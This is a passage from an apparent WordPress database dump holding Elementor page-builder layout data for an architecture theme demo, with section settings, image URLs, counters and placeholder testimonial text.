0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\"},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3037,4743,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3038,38,'_elementor_pro_version','3.8.1'),(3042,2628,'_elementor_css','a:7:{s:4:\"time\";i:1679432244;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(3043,634,'_elementor_css','a:6:{s:4:\"time\";i:1683051415;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3044,930,'_elementor_css','a:6:{s:4:\"time\";i:1685009541;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3045,1100,'_elementor_css','a:6:{s:4:\"time\";i:1685009542;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3046,1037,'_elementor_css','a:6:{s:4:\"time\";i:1685009544;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3047,2465,'_elementor_css','a:6:{s:4:\"time\";i:1685009632;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3048,2469,'_elementor_css','a:6:{s:4:\"time\";i:1685009633;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3049,4746,'_wp_page_template','elementor_header_footer'),(3050,4746,'_elementor_edit_mode','builder'),(3051,4746,'_elementor_template_type','wp-page'),(3052,4746,'_elementor_version','3.8.1'),(3053,4746,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 